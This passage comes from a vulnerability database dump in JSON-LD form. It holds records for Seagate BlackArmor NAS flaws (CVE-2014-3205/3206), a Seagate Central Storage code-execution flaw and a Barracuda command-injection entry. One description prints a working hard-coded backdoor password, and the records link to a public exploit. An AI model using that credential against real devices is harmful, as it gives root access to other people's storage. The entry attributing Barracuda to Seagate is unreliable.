"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05856"
}
]
},
"last_update_date": "2024-11-23T22:07:00.197000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Business NAS",
"trust": 0.8,
"url": "https://www.seagate.com/jp/ja/support/by-product/business-nas/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008529"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71145"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008529"
},
{
"db": "NVD",
"id": "CVE-2014-3206"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.exploit-db.com/exploits/33159/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3206"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3206"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05856"
},
{
"db": "VULHUB",
"id": "VHN-71145"
},
{
"db": "VULMON",
"id": "CVE-2014-3206"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008529"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-608"
},
{
"db": "NVD",
"id": "CVE-2014-3206"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-05856"
},
{
"db": "VULHUB",
"id": "VHN-71145"
},
{
"db": "VULMON",
"id": "CVE-2014-3206"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008529"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-608"
},
{
"db": "NVD",
"id": "CVE-2014-3206"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-05856"
},
{
"date": "2018-02-23T00:00:00",
"db": "VULHUB",
"id": "VHN-71145"
},
{
"date": "2018-02-23T00:00:00",
"db": "VULMON",
"id": "CVE-2014-3206"
},
{
"date": "2018-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008529"
},
{
"date": "2018-02-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201802-608"
},
{
"date": "2018-02-23T17:29:00.410000",
"db": "NVD",
"id": "CVE-2014-3206"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-05856"
},
{
"date": "2018-03-19T00:00:00",
"db": "VULHUB",
"id": "VHN-71145"
},
{
"date": "2018-03-19T00:00:00",
"db": "VULMON",
"id": "CVE-2014-3206"
},
{
"date": "2018-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008529"
},
{
"date": "2018-02-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201802-608"
},
{
"date": "2024-11-21T02:07:40.993000",
"db": "NVD",
"id": "CVE-2014-3206"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201802-608"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate BlackArmor NAS Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008529"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201802-608"
}
],
"trust": 0.6
}
}
VAR-201802-0134
Vulnerability from variot - Updated: 2024-11-23 22:07backupmgt/pre_connect_check.php in Seagate BlackArmor NAS contains a hard-coded password of '!~@##$$%FREDESWWSED' for a backdoor user. BlackArmor NAS Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The SeagateBlackArmorNAS is a network storage server from Seagate, Inc. that provides layered protection, data incremental and system backup, recovery, and more for business-critical data. A security vulnerability exists in the backupmgt/pre_connect_check.php file in SeagateBlackArmorNAS, which was caused by the program using a hard-coded password \342\200\230!~@##$$%FREDESWWSED\342\200\231. There are currently no detailed vulnerability descriptions. A remote attacker can exploit this vulnerability to gain root privileges on the device
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201802-0134",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 1.6,
"vendor": "seagate",
"version": null
},
{
"model": "blackarmor nas 110",
"scope": "eq",
"trust": 1.6,
"vendor": "seagate",
"version": null
},
{
"model": "blackarmor nas",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "technology llc blackarmor nas",
"scope": null,
"trust": 0.6,
"vendor": "seagate",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05857"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008528"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-609"
},
{
"db": "NVD",
"id": "CVE-2014-3205"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:seagate:blackarmor_nas",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008528"
}
]
},
"cve": "CVE-2014-3205",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-3205",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-05857",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-71144",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2014-3205",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-3205",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2014-3205",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-05857",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201802-609",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-71144",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2014-3205",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05857"
},
{
"db": "VULHUB",
"id": "VHN-71144"
},
{
"db": "VULMON",
"id": "CVE-2014-3205"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008528"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-609"
},
{
"db": "NVD",
"id": "CVE-2014-3205"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "backupmgt/pre_connect_check.php in Seagate BlackArmor NAS contains a hard-coded password of \u0027!~@##$$%FREDESWWSED\u0027 for a backdoor user. BlackArmor NAS Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The SeagateBlackArmorNAS is a network storage server from Seagate, Inc. that provides layered protection, data incremental and system backup, recovery, and more for business-critical data. A security vulnerability exists in the backupmgt/pre_connect_check.php file in SeagateBlackArmorNAS, which was caused by the program using a hard-coded password \\342\\200\\230!~@##$$%FREDESWWSED\\342\\200\\231. There are currently no detailed vulnerability descriptions. A remote attacker can exploit this vulnerability to gain root privileges on the device",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-3205"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008528"
},
{
"db": "CNVD",
"id": "CNVD-2018-05857"
},
{
"db": "VULHUB",
"id": "VHN-71144"
},
{
"db": "VULMON",
"id": "CVE-2014-3205"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-3205",
"trust": 3.2
},
{
"db": "EXPLOIT-DB",
"id": "33159",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008528",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-05857",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201802-609",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-71144",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2014-3205",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05857"
},
{
"db": "VULHUB",
"id": "VHN-71144"
},
{
"db": "VULMON",
"id": "CVE-2014-3205"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008528"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-609"
},
{
"db": "NVD",
"id": "CVE-2014-3205"
}
]
},
"id": "VAR-201802-0134",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05857"
},
{
"db": "VULHUB",
"id": "VHN-71144"
}
],
"trust": 1.54343433
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05857"
}
]
},
"last_update_date": "2024-11-23T22:07:00.164000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8",
"trust": 0.8,
"url": "http://www.nexty-ele.com/product/detail/seagate-technology-llc/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008528"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-71144"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008528"
},
{
"db": "NVD",
"id": "CVE-2014-3205"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.exploit-db.com/exploits/33159/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3205"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3205"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05857"
},
{
"db": "VULHUB",
"id": "VHN-71144"
},
{
"db": "VULMON",
"id": "CVE-2014-3205"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008528"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-609"
},
{
"db": "NVD",
"id": "CVE-2014-3205"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-05857"
},
{
"db": "VULHUB",
"id": "VHN-71144"
},
{
"db": "VULMON",
"id": "CVE-2014-3205"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008528"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-609"
},
{
"db": "NVD",
"id": "CVE-2014-3205"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-05857"
},
{
"date": "2018-02-23T00:00:00",
"db": "VULHUB",
"id": "VHN-71144"
},
{
"date": "2018-02-23T00:00:00",
"db": "VULMON",
"id": "CVE-2014-3205"
},
{
"date": "2018-04-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008528"
},
{
"date": "2018-02-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201802-609"
},
{
"date": "2018-02-23T17:29:00.333000",
"db": "NVD",
"id": "CVE-2014-3205"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-05857"
},
{
"date": "2018-03-18T00:00:00",
"db": "VULHUB",
"id": "VHN-71144"
},
{
"date": "2018-03-18T00:00:00",
"db": "VULMON",
"id": "CVE-2014-3205"
},
{
"date": "2018-04-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008528"
},
{
"date": "2018-08-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201802-609"
},
{
"date": "2024-11-21T02:07:40.513000",
"db": "NVD",
"id": "CVE-2014-3205"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201802-609"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "BlackArmor NAS Vulnerabilities related to the use of hard-coded credentials",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008528"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201802-609"
}
],
"trust": 0.6
}
}
VAR-202001-1979
Vulnerability from variot - Updated: 2022-05-17 02:09Seagate Central Storage is a home network hard drive made by Seagate, suitable for home and small office use.
Seagate Central Storage has a remote code execution vulnerability that could be exploited by an attacker to execute code.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1979",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "central storage \u003c=seagate-hs-update-201509160008f",
"scope": null,
"trust": 0.6,
"vendor": "seagate",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02702"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "CNVD-2020-02702",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2020-02702",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02702"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate Central Storage is a home network hard drive made by Seagate, suitable for home and small office use.\n\nSeagate Central Storage has a remote code execution vulnerability that could be exploited by an attacker to execute code.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02702"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "SEEBUG",
"id": "SSVID-98127",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2020-02702",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02702"
}
]
},
"id": "VAR-202001-1979",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02702"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02702"
}
]
},
"last_update_date": "2022-05-17T02:09:42.513000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "https://pentest.blog/advisory-seagate-central-storage-remote-code-exec"
},
{
"trust": 0.6,
"url": "https://www.seebug.org/vuldb/ssvid-98127"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02702"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-02702"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-02702"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-02702"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate Central Storage Remote Code Execution Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02702"
}
],
"trust": 0.6
}
}
VAR-201608-0496
Vulnerability from variot - Updated: 2022-05-17 01:46Barracuda is the general name for a hard drive product line from Seagate Technology. BarracudaWebAppFirewallFirmware, LoadBalancerFirmware has a remote command execution vulnerability. An attack can exploit this vulnerability and inject it into a system command by sending a specially crafted request.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201608-0496",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "technology barracuda web app firewall",
"scope": "lte",
"trust": 0.6,
"vendor": "seagate",
"version": "\u003c=8.0.1.008"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06010"
}
]
},
"cvss": {
"@context": {
